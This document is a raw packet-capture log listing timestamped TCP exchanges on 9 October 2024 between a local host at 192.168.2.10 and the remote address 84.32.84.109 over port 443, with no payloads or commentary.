Oct 9, 2024 16:15:58.107083082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107088089 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107112885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107131004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107177019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107182026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107198954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107224941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107229948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107259989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107346058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107397079 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107400894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107434988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107455015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107460976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107479095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107517958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107603073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107608080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107620001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107692957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107717991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107723951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107749939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107764959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107795000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107886076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107938051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.108006001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.108011007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.108059883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.108077049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.108150005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.108182907 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.108233929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.111148119 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.111269951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.192533970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.192596912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.192620993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.192625999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.192635059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.192670107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.192784071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193016052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193038940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.193042994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193051100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193062067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.193099976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.193099976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.193190098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193329096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.193561077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193612099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.193737984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193770885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193789005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.193797112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193818092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.193939924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193963051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.193969965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193975925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.193991899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.194024086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.194027901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.194084883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.194427967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.194524050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.194546938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.194551945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.194569111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.194596052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.194679976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.194724083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.195174932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.195322990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.195343018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.195348978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.195369959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.195460081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.195501089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.195507050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.195521116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.195673943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.195681095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.197958946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.198004961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.198024988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.198033094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.198061943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.198137999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.198308945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.198331118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.198337078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.198342085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.198359966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.198720932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.198728085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.198784113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.198945999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.198995113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.199001074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.199050903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.199207067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.199260950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.199266911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.199309111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.199659109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.199704885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.199769020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.199809074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.199829102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.199831963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.199852943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.204870939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.284399986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.284465075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.284477949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.284522057 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.284681082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.284993887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.285152912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285182953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285208941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285237074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.285243034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285255909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285265923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285284996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.285326004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.285336018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285352945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285414934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285432100 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.285435915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285444975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285469055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.285523891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.285527945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285798073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285825968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285859108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.285865068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.285909891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.286020041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.286060095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.286062002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.286070108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.286096096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.286113977 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.286118031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.286127090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.286142111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.286151886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.286170959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.286175013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.286199093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.286282063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.286950111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.286988020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.287009954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.287013054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.287026882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.287045956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.287061930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.287087917 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.287091970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.287095070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.287111044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.287121058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.287139893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.287143946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.287148952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.287166119 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.287199020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.287199020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.287204027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.293123007 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.293868065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.293963909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.293994904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.294001102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.294019938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.294193029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.294224024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.294244051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.294249058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.294254065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.294271946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.294513941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.294531107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.294534922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.294559956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.305205107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.376311064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.376406908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.376442909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.376590014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.376627922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.376637936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.376673937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.376687050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.376729965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.376737118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.376804113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.376826048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.376908064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.376920938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.376981974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377022028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377079964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377111912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377177954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377216101 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377271891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377320051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377420902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377454996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377470970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377476931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377516985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377566099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377569914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377639055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377654076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377721071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377739906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377799034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377823114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.377888918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.377911091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378009081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378031969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378036976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378067970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378108978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378165960 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378170967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378209114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378217936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378304958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378314972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378390074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378412962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378487110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378498077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378587961 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378602028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378618956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378652096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378849030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378911018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.378942013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.378988028 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.379043102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.379095078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.379164934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.379216909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.379255056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.379319906 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.379343987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.379430056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.379461050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.379544973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.379560947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.379622936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.379652977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.379708052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.485436916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.485534906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.485553980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.485564947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.485595942 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.485718966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.485738039 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.485742092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.485747099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.485766888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.485848904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.485853910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.485893965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486026049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486057997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486067057 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486071110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486109972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486109972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486318111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486362934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486499071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486541033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486545086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486577988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486593008 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486597061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486624002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486665010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486680984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486727953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.486732006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.486845016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.487581968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.487628937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.487756014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.487787008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.487803936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.487857103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.487857103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.487863064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.487945080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.488378048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.488426924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.488432884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.488442898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.488460064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.488478899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.488482952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.488502026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.488595009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.488827944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.488878965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489032984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489051104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489065886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489084005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489088058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489093065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489113092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489207029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489213943 CEST	49723	443	192.168.2.10	84.32.84.109
